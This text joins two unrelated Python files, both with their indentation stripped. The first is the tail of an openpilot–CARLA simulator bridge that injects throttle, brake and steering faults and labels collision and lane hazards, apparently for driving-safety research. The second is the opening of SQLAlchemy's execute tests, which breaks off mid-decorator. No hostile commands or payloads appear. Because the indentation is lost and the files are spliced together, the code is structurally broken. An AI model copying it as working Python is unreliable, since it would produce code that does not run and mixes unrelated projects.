ylaneLines = [round(md.laneLines[0].y[0],2),round(md.laneLines[1].y[0],2),round(md.laneLines[2].y[0],2),round(md.laneLines[3].y[0],2)]
yroadEdges = [round(md.roadEdges[0].y[0],2), round(md.roadEdges[1].y[0],2)] #left and right roadedges
# print(ylaneLines[2] - yPos)
if len(ylaneLines)>2:
laneLineleft = ylaneLines[1]
laneLineright = ylaneLines[2]
pathleft = yPos- laneLineleft
pathright = laneLineright-yPos
roadEdgeLeft = yroadEdges[0]
roadEdgeRight = yroadEdges[1]
#controlsState
alertText1 = sm['controlsState'].alertText1
alertText2 = sm['controlsState'].alertText2
alertType = sm['controlsState'].alertType
if alertType and alertType not in alertType_list and alertText1 not in alertText1_list:
alertText1_list.append(alertText1)
alertType_list.append(alertType)
if(alerttime== -1 and 'startupMaster/permanent' not in alertType and 'buttonEnable/enable' not in alertType):
alerttime = frameIdx
alert = True
print("=================Alert============================")
print(alertType,":",alertText1,alertText2)
else:
if throttle_out==0 and old_throttle>0:
if throttle_ease_out_counter>0:
throttle_out = old_throttle
throttle_ease_out_counter += -1
else:
throttle_ease_out_counter = REPEAT_COUNTER
old_throttle = 0
if brake_out==0 and old_brake>0:
if brake_ease_out_counter>0:
brake_out = old_brake
brake_ease_out_counter += -1
else:
brake_ease_out_counter = REPEAT_COUNTER
old_brake = 0
if steer_out==0 and old_steer!=0:
if steer_ease_out_counter>0:
steer_out = old_steer
steer_ease_out_counter += -1
else:
steer_ease_out_counter = REPEAT_COUNTER
old_steer = 0
# --------------Step 2-------------------------------
steer_carla = steer_out / (max_steer_angle * STEER_RATIO * -1)
steer_carla = np.clip(steer_carla, -1,1)
steer_out = steer_carla * (max_steer_angle * STEER_RATIO * -1)
old_steer = steer_carla * (max_steer_angle * STEER_RATIO * -1)
if speed:
headway_time = dRel/speed
else:
headway_time = 100
RSpeed = -vRel #v_Ego -V_Lead
if FI_Enable == True:
if Mode_FI_duration>0: #
if FI_flag>0: #reset FI
FI_flag = 0
FI_Type = 0
#*********************************************#
#condition to activate fault injection
#throttle:HOOK#
# manual FI examples
# if headway_time<=2.0 and RSpeed>=0 and vLead!=0:
# FI_Type |= 0x01
# FI_flag = 1
# FI_duration = 100
# FI_H3_combine_enable = 1
# if frameIdx>1000 and (headway_time>2.0 and RSpeed<0 and Lead_vehicle_in_vision or Lead_vehicle_in_vision==False):
# FI_Type |= 0x02
# FI_flag=1
if FI_H3_combine_enable:
if speed>15 and laneLineleft>-1.25:
FI_Type |= 0x04
FI_flag=1
if speed>15 and laneLineleft<1.25:
FI_Type |= 0x08 #0b1000
FI_flag=1
#*********************************************#
#condition to stop fault injection and start human driver engagement if FI
if Driver_react_Enable == True:
if driver_alerted_time >= 0 and frameIdx >=250 + driver_alerted_time: #average reaction time 2.5s
#stop fault injection
FI_flag = -1
#human driver reaction # full brake
if FI_Type&0x01: # max gas
throttle_out = 0
brake_out = 1
steer_carla = 0
#execute fault injection
if FI_flag > 0:
if fault_duration < FI_duration: #time budget
if faulttime == -1:
faulttime = frameIdx
fault_duration += 1
if FI_Type&0x01: # max gas
throttle_out=0.6
brake_out=0
if FI_Type&0x02: #max brake
throttle_out=0
brake_out = 1
if FI_Type&0x04: #max left steer
steer_carla = vc.steer - 0.5/(max_steer_angle * STEER_RATIO ) #maximum change 0.5 degree at each step
steer_carla = np.clip(steer_carla, -1,1)
if FI_Type&0x08: #max right steer
steer_carla = vc.steer + 0.5/(max_steer_angle * STEER_RATIO ) #maximum change 0.5 degree at each step
steer_carla = np.clip(steer_carla, -1,1)
else:
FI_flag = 0
vc.throttle = throttle_out/0.6
vc.steer = steer_carla
vc.brake = brake_out
vehicle.apply_control(vc)
# vehicle2.apply_control(vc)
# measurements, sensor_data = client.read_data()
# control = measurements.player_measurements.autopilot_control
# client.send_control(control)
# --------------Step 3-------------------------------
vel = vehicle.get_velocity()
speed = math.sqrt(vel.x**2 + vel.y**2 + vel.z**2) # in m/s
acc = vehicle.get_acceleration()
acceleration = math.sqrt(acc.x**2 + acc.y**2 + acc.z**2) # in m/s^2
if speed==acceleration==0:
acceleration =1
vehicle_state.speed = speed
vehicle_state.vel = vel
vehicle_state.angle = steer_out
vehicle_state.cruise_button = cruise_button
vehicle_state.is_engaged = is_openpilot_engaged
vel_pos = vehicle.get_transform().location
vel2_pos = vehicle2.get_transform().location
vel4_pos = vel2_pos
if Other_vehicles_Enable:
vel4_pos = vehicle4.get_transform().location
#-----------------------------------------------------
if frameIdx == 1000:
if speed <0.02 and throttle_out <0.02 and brake_out <0.02: #fail to start
reInitialize_bridge = True
print("reInitialize bridge.py...\n")
break
#------------------------------------------------------
if driver_alerted_time == -1 and fault_duration>0 and (alert or throttle_out>= 0.6 or speed>1.1*vEgo or brake_out>0.95): #max gas//max brake//exceed speed limit
driver_alerted_time =frameIdx #driver is alerted
#Accident: collision
if len(collision_hist):
print(collision_hist[0],collision_hist[0].other_actor)
# print(vehicle2)
if collision_hist[0].other_actor.id == vehicle2.id: #collide with vehicle2:
dRel = -0.1
if "lead" not in hazMsg:
hazMsg +="||collide with lead vihecle||"
else:
if "curb" not in hazMsg:
hazMsg +="||collide with curb||"
if hazType&0x04 == 0:
hazard = True
hazardtime =frameIdx
hazMsg +="H3"
hazType |= 0x04 #0b 100
#if laneInvasion
laneInvasion_Flag = False
if len(laneInvasion_hist)>Num_laneInvasion:
# hazard = True
laneInvasion_Flag =True
Num_laneInvasion = len(laneInvasion_hist)
t_laneInvasion = frameIdx
print(Num_laneInvasion,laneInvasion_hist[-1],laneInvasion_hist[-1].crossed_lane_markings)
# del(laneInvasion_hist[0])
#lable hazard
if dRel <0.5 and Lead_vehicle_in_vision and 'curb' not in hazMsg: # unsafe distance # collide with curb is not H1
if hazType&0x01 == 0:
hazard = True
hazardtime =frameIdx
hazMsg +="H1"
hazType |= 0x01 #0b 001
if speed<0.02 and (dRel >50 or Lead_vehicle_in_vision==False) and fault_duration>0: #decrease the speed to full stop without a lead vehicle
if hazType&0x02 == 0:
H2_count += 1
if H2_count>100: #last for 1 second
hazard = True
hazardtime =frameIdx
hazMsg +="H2"
hazType |= 0x02 #0b 100
else:
H2_count = 0
if Num_laneInvasion > 0 and (roadEdgeRight <3.7 and (pathright <1.15) or roadEdgeRight>7.4): #lane width = 3.7m vehicle width =2.3m or(ylaneLines[3] -ylaneLines[2] <1.15)
if hazType&0x04 == 0:
hazard = True
hazardtime =frameIdx
hazMsg +="H3"
hazType |= 0x04 #0b 100
#result print out
# if rk.frame%PRINT_DECIMATION == 0:
if rk.frame%PRINT_DECIMATION == 0 or dRel<1 and Lead_vehicle_in_vision:
print("Frame ID:",frameIdx,"frame: ", rk.frame,"engaged:", is_openpilot_engaged, "; throttle: ", round(vc.throttle, 3), "acc:" ,round(acceleration,2),round(throttle_out_hist/acceleration,2),"; steer(c/deg): ", round(vc.steer, 3), round(steer_out, 3), "; brake: ", round(vc.brake, 3),\
"speed:",round(speed,2),'vLead:',round(vLead,2),"vRel",round(-vRel,2),"drel:",round(dRel,2),round(yRel,2),'Lanelines',yPos,ylaneLines,yroadEdges,"FI:",FI_flag,"Hazard:",hazard)
#result record in files
if is_openpilot_engaged :#and (frameIdx%20==0 or (dRel<1 and Lead_vehicle_in_vision)): #record every 20*10=0.2s
fp_res.write("{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{}\n".format(frameIdx,0,speed,acceleration,steer_out,vc.throttle,vc.brake,vc.steer,actuators_steeringAngleDeg,actuators_steer,actuators_accel, dRel,-vRel,yRel,FI_flag>0,FI_Type if FI_flag else 0 ,alert,hazard,hazType,altMsg,hazMsg, laneInvasion_Flag,yPos,ylaneLines,pathleft,pathright,roadEdgeLeft,roadEdgeRight,vel_pos.x,vel_pos.y,vel2_pos.x,vel2_pos.y,vel4_pos.x,vel4_pos.y))
rk.keep_time()
throttle_out_hist = vc.throttle
#brake with hazard
if hazard:# or FI_flag ==-1 and speed<0.01:
if 'collide' in hazMsg or frameIdx - hazardtime >250: #terminate the simulation right after any collision or wait 2 seconds after any hazard
break
#store alert,hazard message to a file, which will be stored in a summary file
Alert_flag = len(alertType_list)>0 and 'startupMaster/permanent' not in alertType_list and 'buttonEnable/enable' not in alertType_list
fp_temp = open("temp.txt",'w')
fp_temp.write("{},{},{},{},{},{},{},{},{}".format("||".join(alertType_list),hazMsg,faulttime,alerttime,hazardtime, Alert_flag,hazard,fault_duration,Num_laneInvasion ))
fp_temp.close()
# Clean up resources in the opposite order they were created.
exit_event.set()
for t in reversed(threads):
t.join()
# t.stop()
gps.destroy()
imu.destroy()
camera.destroy()
vehicle.destroy()
colsensor.destroy()
vehicle2.set_autopilot(False,8008)
vehicle2.destroy()
if Other_vehicles_Enable:
vehicle3.set_autopilot(False,8008)
vehicle3.destroy()
vehicle4.set_autopilot(False,8008)
vehicle4.destroy()
vehicle5.set_autopilot(False,8008)
vehicle5.destroy()
fp_res.close()
# os.killpg(os.getpgid(os.getpid()), signal.SIGINT) #kill the remaining threads
sys.exit(0)
# exit()
def bridge_keep_alive(q: Any):
while 1:
try:
bridge(q)
break
except RuntimeError:
print("Restarting bridge...")
if __name__ == "__main__":
# print(os.getcwd())
# os.system('rm ./results/*')
# make sure params are in a good state
set_params_enabled()
msg = messaging.new_message('liveCalibration')
msg.liveCalibration.validBlocks = 20
msg.liveCalibration.rpyCalib = [0.0, 0.0, 0.0]
Params().put("CalibrationParams", msg.to_bytes())
q: Any = Queue()
#=================================================
# p = Process(target=bridge_keep_alive, args=(q,), daemon=True)
# p.start()
# if 0:#args.joystick:
# # start input poll for joystick
# from lib.manual_ctrl import wheel_poll_thread
# wheel_poll_thread(q)
# p.join()
# else:
# # start input poll for keyboard
# from lib.keyboard_ctrl import keyboard_poll_thread
# keyboard_poll_thread(q)
##===========================================
# # start input poll for keyboard
# from lib.keyboard_ctrl import keyboard_poll_thread
# p_keyboard = Process(target=keyboard_poll_thread, args=(q,), daemon=True)
# p_keyboard.start()
bridge_keep_alive(q)
# if reInitialize_bridge: #if fail to intialize, do it again
# q: Any = Queue()
# bridge_keep_alive(q)
# p_keyboard.join()
|
test_execute.py
|
# coding: utf-8
import collections.abc as collections_abc
from contextlib import contextmanager
from contextlib import nullcontext
import copy
from io import StringIO
import re
import threading
from unittest import mock
from unittest.mock import call
from unittest.mock import Mock
from unittest.mock import patch
import weakref
import sqlalchemy as tsa
from sqlalchemy import bindparam
from sqlalchemy import create_engine
from sqlalchemy import create_mock_engine
from sqlalchemy import event
from sqlalchemy import func
from sqlalchemy import inspect
from sqlalchemy import INT
from sqlalchemy import Integer
from sqlalchemy import LargeBinary
from sqlalchemy import MetaData
from sqlalchemy import select
from sqlalchemy import Sequence
from sqlalchemy import String
from sqlalchemy import testing
from sqlalchemy import text
from sqlalchemy import TypeDecorator
from sqlalchemy import util
from sqlalchemy import VARCHAR
from sqlalchemy.engine import BindTyping
from sqlalchemy.engine import default
from sqlalchemy.engine.base import Connection
from sqlalchemy.engine.base import Engine
from sqlalchemy.pool import NullPool
from sqlalchemy.pool import QueuePool
from sqlalchemy.sql import column
from sqlalchemy.sql import literal
from sqlalchemy.sql.elements import literal_column
from sqlalchemy.testing import assert_raises
from sqlalchemy.testing import assert_raises_message
from sqlalchemy.testing import config
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises_message
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_false
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing.assertions import expect_deprecated
from sqlalchemy.testing.assertsql import CompiledSQL
from sqlalchemy.testing.schema import Column
from sqlalchemy.testing.schema import Table
from sqlalchemy.testing.util import gc_collect
from sqlalchemy.testing.util import picklers
class SomeException(Exception):
pass
class Foo:
def __str__(self):
return "foo"
def __unicode__(self):
return "fóó"
class ExecuteTest(fixtures.TablesTest):
__backend__ = True
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column("user_id", INT, primary_key=True, autoincrement=False),
Column("user_name", VARCHAR(20)),
)
Table(
"users_autoinc",
metadata,
Column(
"user_id", INT, primary_key=True, test_needs_autoincrement=True
),
Column("user_name", VARCHAR(20)),
)
def test_no_params_option(self):
stmt = (
"SELECT '%'"
+ testing.db.dialect.statement_compiler(
testing.db.dialect, None
).default_from()
)
with testing.db.connect() as conn:
result = (
conn.execution_options(no_parameters=True)
.exec_driver_sql(stmt)
.scalar()
)
eq_(result, "%")
def test_no_strings(self, connection):
with expect_raises_message(
tsa.exc.ObjectNotExecutableError,
"Not an executable object: 'select 1'",
):
connection.execute("select 1")
def test_raw_positional_invalid(self, connection):
assert_raises_message(
tsa.exc.ArgumentError,
"List argument must consist only of tuples or dictionaries",
connection.exec_driver_sql,
"insert into users (user_id, user_name) values (?, ?)",
[2, "fred"],
)
assert_raises_message(
tsa.exc.ArgumentError,
"List argument must consist only of tuples or dictionaries",
connection.exec_driver_sql,
"insert into users (user_id, user_name) values (?, ?)",
[[3, "ed"], [4, "horse"]],
)
def test_raw_named_invalid(self, connection):
# this is awkward b.c. this is just testing if regular Python
# is raising TypeError if they happened to send arguments that
# look like the legacy ones which also happen to conflict with
# the positional signature for the method. some combinations
# can get through and fail differently
assert_raises(
TypeError,
connection.exec_driver_sql,
"insert into users (user_id, user_name) "
"values (%(id)s, %(name)s)",
{"id": 2, "name": "ed"},
{"id": 3, "name": "horse"},
{"id": 4, "name": "horse"},
)
assert_raises(
TypeError,
connection.exec_driver_sql,
"insert into users (user_id, user_name) "
"values (%(id)s, %(name)s)",
id=4,
name="sally",
)
@testing.requires.qmark_paramstyle
def test_raw_qmark(self, connection):
conn = connection
conn.exec_driver_sql(
"insert into users (user_id, user_name) values (?, ?)",
(1, "jack"),
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) values (?, ?)",
(2, "fred"),
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) values (?, ?)",
[(3, "ed"), (4, "horse")],
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) values (?, ?)",
[(5, "barney"), (6, "donkey")],
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) values (?, ?)",
(7, "sally"),
)
res = conn.exec_driver_sql("select * from users order by user_id")
assert res.fetchall() == [
(1, "jack"),
(2, "fred"),
(3, "ed"),
(4, "horse"),
(5, "barney"),
(6, "donkey"),
(7, "sally"),
]
res = conn.exec_driver_sql(
"select * from users where user_name=?", ("jack",)
)
assert res.fetchall() == [(1, "jack")]
@testing.requires.format_paramstyle
def test_raw_sprintf(self, connection):
conn = connection
conn.exec_driver_sql(
"insert into users (user_id, user_name) values (%s, %s)",
(1, "jack"),
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) values (%s, %s)",
[(2, "ed"), (3, "horse")],
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) values (%s, %s)",
(4, "sally"),
)
conn.exec_driver_sql("insert into users (user_id) values (%s)", (5,))
res = conn.exec_driver_sql("select * from users order by user_id")
assert res.fetchall() == [
(1, "jack"),
(2, "ed"),
(3, "horse"),
(4, "sally"),
(5, None),
]
res = conn.exec_driver_sql(
"select * from users where user_name=%s", ("jack",)
)
assert res.fetchall() == [(1, "jack")]
@testing.requires.pyformat_paramstyle
def test_raw_python(self, connection):
conn = connection
conn.exec_driver_sql(
"insert into users (user_id, user_name) "
"values (%(id)s, %(name)s)",
{"id": 1, "name": "jack"},
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) "
"values (%(id)s, %(name)s)",
[{"id": 2, "name": "ed"}, {"id": 3, "name": "horse"}],
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) "
"values (%(id)s, %(name)s)",
dict(id=4, name="sally"),
)
res = conn.exec_driver_sql("select * from users order by user_id")
assert res.fetchall() == [
(1, "jack"),
(2, "ed"),
(3, "horse"),
(4, "sally"),
]
@testing.requires.named_paramstyle
def test_raw_named(self, connection):
conn = connection
conn.exec_driver_sql(
"insert into users (user_id, user_name) values (:id, :name)",
{"id": 1, "name": "jack"},
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) values (:id, :name)",
[{"id": 2, "name": "ed"}, {"id": 3, "name": "horse"}],
)
conn.exec_driver_sql(
"insert into users (user_id, user_name) values (:id, :name)",
{"id": 4, "name": "sally"},
)
res = conn.exec_driver_sql("select * from users order by user_id")
assert res.fetchall() == [
(1, "jack"),
(2, "ed"),
(3, "horse"),
(4, "sally"),
]
def test_raw_tuple_params(self, connection):
"""test #7820
There was an apparent improvement in the distill params
methodology used in exec_driver_sql which allows raw tuples to
pass through. In 1.4 there seems to be a _distill_cursor_params()
function that says it can handle this kind of parameter, but it isn't
used and when I tried to substitute it in for exec_driver_sql(),
things still fail.
In any case, add coverage here for the use case of passing
direct tuple params to exec_driver_sql including as the first
param, to note that it isn't mis-interpreted the way it is
in 1.x.
"""
with patch.object(connection.dialect, "do_execute") as do_exec:
connection.exec_driver_sql(
"UPDATE users SET user_name = 'query_one' WHERE "
"user_id = %s OR user_id IN %s",
(3, (1, 2)),
)
connection.exec_driver_sql(
"UPDATE users SET user_name = 'query_two' WHERE "
"user_id IN %s OR user_id = %s",
((1, 2), 3),
)
eq_(
do_exec.mock_calls,
[
call(
mock.ANY,
"UPDATE users SET user_name = 'query_one' "
"WHERE user_id = %s OR user_id IN %s",
connection.dialect.execute_sequence_format((3, (1, 2))),
mock.ANY,
),
call(
mock.ANY,
"UPDATE users SET user_name = 'query_two' "
"WHERE user_id IN %s OR user_id = %s",
connection.dialect.execute_sequence_format(((1, 2), 3)),
mock.ANY,
),
],
)
def test_non_dict_mapping(self, connection):
"""ensure arbitrary Mapping works for execute()"""
class NotADict(collections_abc.Mapping):
def __init__(self, _data):
self._data = _data
def __iter__(self):
return iter(self._data)
def __len__(self):
return len(self._data)
def __getitem__(self, key):
return self._data[key]
def keys(self):
return self._data.keys()
nd = NotADict({"a": 10, "b": 15})
eq_(dict(nd), {"a": 10, "b": 15})
result = connection.execute(
select(
bindparam("a", type_=Integer), bindparam("b", type_=Integer)
),
nd,
)
eq_(result.first(), (10, 15))
def test_row_works_as_mapping(self, connection):
"""ensure the RowMapping object works as a parameter dictionary for
execute."""
result = connection.execute(
select(literal(10).label("a"), literal(15).label("b"))
)
row = result.first()
eq_(row, (10, 15))
eq_(row._mapping, {"a": 10, "b": 15})
result = connection.execute(
select(
bindparam("a", type_=Integer).label("a"),
bindparam("b", type_=Integer).label("b"),
),
row._mapping,
)
row = result.first()
eq_(row, (10, 15))
eq_(row._mapping, {"a": 10, "b": 15})
def test_dialect_has_table_assertion(self):
with expect_raises_message(
tsa.exc.ArgumentError,
r"The argument passed to Dialect.has_table\(\) should be a",
):
testing.db.dialect.has_table(testing.db, "some_table")
def test_exception_wrapping_dbapi(self):
with testing.db.connect() as conn:
# engine does not have exec_driver_sql
assert_raises_message(
tsa.exc.DBAPIError,
r"not_a_valid_statement",
conn.exec_driver_sql,
"not_a_valid_statement",
)
@testing.requires.sqlite
def test_exception_wrapping_non_dbapi_error(self):
e = create_engine("sqlite://")
e.dialect.is_disconnect = is_disconnect = Mock()
with e.connect() as c:
c.connection.cursor = Mock(
return_value=Mock(
execute=Mock(
side_effect=TypeError("I'm not a DBAPI error")
)
)
)
assert_raises_message(
TypeError,
"I'm not a DBAPI error",
c.exec_driver_sql,
"select ",
)
eq_(is_disconnect.call_count, 0)
def test_exception_wrapping_non_standard_dbapi_error(self):
class DBAPIError(Exception):
pass
class OperationalError(DBAPIError):
pass
class NonStandardException(OperationalError):
pass
# TODO: this test is assuming too much of arbitrary dialects and would
# be better suited tested against a single mock dialect that does not
# have any special behaviors
with patch.object(
testing.db.dialect, "dbapi", Mock(Error=DBAPIError)
), patch.object(
testing.db.dialect, "loaded_dbapi", Mock(Error=DBAPIError)
), patch.object(
testing.db.dialect, "is_disconnect", lambda *arg: False
), patch.object(
testing.db.dialect,
"do_execute",
Mock(side_effect=NonStandardException),
), patch.object(
testing.db.dialect.execution_ctx_cls,
"handle_dbapi_exception",
Mock(),
):
with testing.db.connect() as conn:
assert_raises(
tsa.exc.OperationalError, conn.exec_driver_sql, "select 1"
)
def test_exception_wrapping_non_dbapi_statement(self):
class MyType(TypeDecorator):
impl = Integer
cache_ok = True
def process_bind_param(self, value, dialect):
raise SomeException("nope")
def _go(conn):
assert_raises_message(
tsa.exc.StatementError,
r"\(.*.SomeException\) " r"nope\n\[SQL\: u?SELECT 1 ",
conn.execute,
select(1).where(column("foo") == literal("bar", MyType())),
)
with testing.db.connect() as conn:
_go(conn)
def test_not_an_executable(self):
for obj in (
Table("foo", MetaData(), Column("x", Integer)),
Column("x", Integer),
tsa.and_(True),
tsa.and_(True).compile(),
column("foo"),
column("foo").compile(),
select(1).cte(),
# select(1).subquery(),
MetaData(),
Integer(),
tsa.Index(name="foo"),
tsa.UniqueConstraint("x"),
):
with testing.db.connect() as conn:
assert_raises_message(
tsa.exc.ObjectNotExecutableError,
"Not an executable object",
conn.execute,
obj,
)
def test_subquery_exec_warning(self):
for obj in (select(1).alias(), select(1).subquery()):
with testing.db.connect() as conn:
with expect_deprecated(
"Executing a subquery object is deprecated and will "
"raise ObjectNotExecutableError"
):
eq_(conn.execute(obj).scalar(), 1)
def test_stmt_exception_bytestring_raised(self):
name = "méil"
users = self.tables.users
with testing.db.connect() as conn:
assert_raises_message(
tsa.exc.StatementError,
"A value is required for bind parameter 'uname'\n"
".*SELECT users.user_name AS .méil.",
conn.execute,
select(users.c.user_name.label(name)).where(
users.c.user_name == bindparam("uname")
),
{"uname_incorrect": "foo"},
)
def test_stmt_exception_bytestring_utf8(self):
# uncommon case for Py3K, bytestring object passed
# as the error message
message = "some message méil".encode("utf-8")
err = tsa.exc.SQLAlchemyError(message)
eq_(str(err), "some message méil")
def test_stmt_exception_bytestring_latin1(self):
# uncommon case for Py3K, bytestring object passed
# as the error message
message = "some message méil".encode("latin-1")
err = tsa.exc.SQLAlchemyError(message)
eq_(str(err), "some message m\\xe9il")
def test_stmt_exception_unicode_hook_unicode(self):
# uncommon case for Py2K, Unicode object passed
# as the error message
message = "some message méil"
err = tsa.exc.SQLAlchemyError(message)
eq_(str(err), "some message méil")
def test_stmt_exception_object_arg(self):
err = tsa.exc.SQLAlchemyError(Foo())
eq_(str(err), "foo")
def test_stmt_exception_str_multi_args(self):
err = tsa.exc.SQLAlchemyError("some message", 206)
eq_(str(err), "('some message', 206)")
def test_stmt_exception_str_multi_args_bytestring(self):
message = "some message méil".encode("utf-8")
err = tsa.exc.SQLAlchemyError(message, 206)
eq_(str(err), str((message, 206)))
def test_stmt_exception_str_multi_args_unicode(self):
message = "some message méil"
err = tsa.exc.SQLAlchemyError(message, 206)
eq_(str(err), str((message, 206)))
def test_stmt_exception_pickleable_no_dbapi(self):
self._test_stmt_exception_pickleable(Exception("hello world"))
@testing.crashes(
"postgresql+psycopg2",
"Older versions don't support cursor pickling, newer ones do",
)
@testing.fails_on(
"mysql+mysqlconnector",
"Exception doesn't come back exactly the same from pickle",
)
@testing.fails_on(
"oracle+cx_oracle",
"cx_oracle exception seems to be having some issue with pickling",
)
def test_stmt_exception_pickleable_plus_dbapi(self):
raw = testing.db.raw_connection()
the_orig = None
try:
try:
cursor = raw.cursor()
cursor.execute("SELECTINCORRECT")
except testing.db.dialect.dbapi.Error as orig:
# py3k has "orig" in local scope...
the_orig = orig
finally:
raw.close()
self._test_stmt_exception_pickleable(the_orig)
def _test_stmt_exception_pickleable(self, orig):
for sa_exc in (
tsa.exc.StatementError(
"some error",
"select * from table",
{"foo": "bar"},
orig,
False,
),
tsa.exc.InterfaceError(
"select * from table", {"foo": "bar"}, orig, True
),
tsa.exc.NoReferencedTableError("message", "tname"),
tsa.exc.NoReferencedColumnError("message", "tname", "cname"),
tsa.exc.CircularDependencyError(
"some message", [1, 2, 3], [(1, 2), (3, 4)]
),
):
for loads, dumps in picklers():
repickled = loads(dumps(sa_exc))
eq_(repickled.args[0], sa_exc.args[0])
if isinstance(sa_exc, tsa.exc.StatementError):
eq_(repickled.params, {"foo": "bar"})
eq_(repickled.statement, sa_exc.statement)
if hasattr(sa_exc, "connection_invalidated"):
eq_(
repickled.connection_invalidated,
sa_exc.connection_invalidated,
)
eq_(repickled.orig.args[0], orig.args[0])
def test_dont_wrap_mixin(self):
class MyException(Exception, tsa.exc.DontWrapMixin):
pass
class MyType(TypeDecorator):
impl = Integer
cache_ok = True
def process_bind_param(self, value, dialect):
raise MyException("nope")
def _go(conn):
assert_raises_message(
MyException,
"nope",
conn.execute,
select(1).where(column("foo") == literal("bar", MyType())),
)
conn = testing.db.connect()
try:
_go(conn)
finally:
conn.close()
def test_empty_insert(self, connection):
"""test that execute() interprets [] as a list with no params"""
users_autoinc = self.tables.users_autoinc
connection.execute(
users_autoinc.insert().values(user_name=bindparam("name", None)),
[],
)
eq_(connection.execute(users_autoinc.select()).fetchall(), [(1, None)])
@testing.only_on("sqlite")
def test_execute_compiled_favors_compiled_paramstyle(self):
users = self.tables.users
with patch.object(testing.db.dialect, "do_execute") as do_exec:
stmt = users.update().values(user_id=1, user_name="foo")
d1 = default.DefaultDialect(paramstyle="format")
d2 = default.DefaultDialect(paramstyle="pyformat")
with testing.db.begin() as conn:
conn.execute(stmt.compile(dialect=d1))
conn.execute(stmt.compile(dialect=d2))
eq_(
do_exec.mock_calls,
[
call(
mock.ANY,
"UPDATE users SET user_id=%s, user_name=%s",
(1, "foo"),
mock.ANY,
),
call(
mock.ANY,
"UPDATE users SET user_id=%(user_id)s, "
"user_name=%(user_name)s",
{"user_name": "foo", "user_id": 1},
mock.ANY,
),
],
)
@testing.requires.ad_hoc_engines
def test_engine_level_options(self):
eng = engines.testing_engine(
options={"execution_options": {"foo": "bar"}}
)
with eng.connect() as conn:
eq_(conn._execution_options["foo"], "bar")
eq_(
conn.execution_options(bat="hoho")._execution_options["foo"],
"bar",
)
eq_(
conn.execution_options(bat="hoho")._execution_options["bat"],
"hoho",
)
eq_(
conn.execution_options(foo="hoho")._execution_options["foo"],
"hoho",
)
eng.update_execution_options(foo="hoho")
conn = eng.connect()
eq_(conn._execution_options["foo"], "hoho")
@testing.requires.ad_hoc_engines
def test_generative_engine_execution_options(self):
eng = engines.testing_engine(
options={"execution_options": {"base": "x1"}}
)
is_(eng.engine, eng)
eng1 = eng.execution_options(foo="b1")
is_(eng1.engine, eng1)
eng2 = eng.execution_options(foo="b2")
eng1a = eng1.execution_options(bar="a1")
eng2a = eng2.execution_options(foo="b3", bar="a2")
is_(eng2a.engine, eng2a)
eq_(eng._execution_options, {"base": "x1"})
eq_(eng1._execution_options, {"base": "x1", "foo": "b1"})
eq_(eng2._execution_options, {"base": "x1", "foo": "b2"})
eq_(eng1a._execution_options, {"base": "x1", "foo": "b1", "bar": "a1"})
eq_(eng2a._execution_options, {"base": "x1", "foo": "b3", "bar": "a2"})
is_(eng1a.pool, eng.pool)
# test pool is shared
eng2.dispose()
is_(eng1a.pool, eng2.pool)
is_(eng.pool, eng2.pool)
@testing.requires.ad_hoc_engines
def test_autocommit_option_no_issue_first_connect(self):
eng = create_engine(testing.db.url)
eng.update_execution_options(autocommit=True)
conn = eng.connect()
eq_(conn._execution_options, {"autocommit": True})
conn.close()
def test_initialize_rollback(self):
"""test a rollback happens during first connect"""
eng = create_engine(testing.db.url)
with patch.object(eng.dialect, "do_rollback") as do_rollback:
assert do_rollback.call_count == 0
connection = eng.connect()
assert do_rollback.call_count == 1
connection.close()
@testing.requires.ad_hoc_engines
def test_dialect_init_uses_options(self):
eng = create_engine(testing.db.url)
def my_init(connection):
connection.execution_options(foo="bar").execute(select(1))
with patch.object(eng.dialect, "initialize", my_init):
conn = eng.connect()
eq_(conn._execution_options, {})
conn.close()
@testing.requires.ad_hoc_engines
def test_generative_engine_event_dispatch_hasevents(self):
def l1(*arg, **kw):
pass
eng = create_engine(testing.db.url)
assert not eng._has_events
event.listen(eng, "before_execute", l1)
eng2 = eng.execution_options(foo="bar")
assert eng2._has_events
def test_works_after_dispose(self):
eng = create_engine(testing.db.url)
for i in range(3):
with eng.connect() as conn:
eq_(conn.scalar(select(1)), 1)
eng.dispose()
def test_works_after_dispose_testing_engine(self):
eng = engines.testing_engine()
for i in range(3):
with eng.connect() as conn:
eq_(conn.scalar(select(1)), 1)
eng.dispose()
def test_scalar(self, connection):
conn = connection
users = self.tables.users
conn.execute(
users.insert(),
[
{"user_id": 1, "user_name": "sandy"},
{"user_id": 2, "user_name": "spongebob"},
],
)
res = conn.scalar(select(users.c.user_name).order_by(users.c.user_id))
eq_(res, "sandy")
def test_scalars(self, connection):
conn = connection
users = self.tables.users
conn.execute(
users.insert(),
[
{"user_id": 1, "user_name": "sandy"},
{"user_id": 2, "user_name": "spongebob"},
],
)
res = conn.scalars(select(users.c.user_name).order_by(users.c.user_id))
eq_(res.all(), ["sandy", "spongebob"])
@testing.combinations(
({}, {}, {}),
({"a": "b"}, {}, {"a": "b"}),
({"a": "b", "d": "e"}, {"a": "c"}, {"a": "c", "d": "e"}),
argnames="conn_opts, exec_opts, expected",
)
def test_execution_opts_per_invoke(
self, connection, conn_opts, exec_opts, expected
):
opts = []
@event.listens_for(connection, "before_cursor_execute")
def before_cursor_execute(
conn, cursor, statement, parameters, context, executemany
):
opts.append(context.execution_options)
if conn_opts:
connection = connection.execution_options(**conn_opts)
if exec_opts:
connection.execute(select(1), execution_options=exec_opts)
else:
connection.execute(select(1))
eq_(opts, [expected])
@testing.combinations(
({}, {}, {}, {}),
({}, {"a": "b"}, {}, {"a": "b"}),
({}, {"a": "b", "d": "e"}, {"a": "c"}, {"a": "c", "d": "e"}),
(
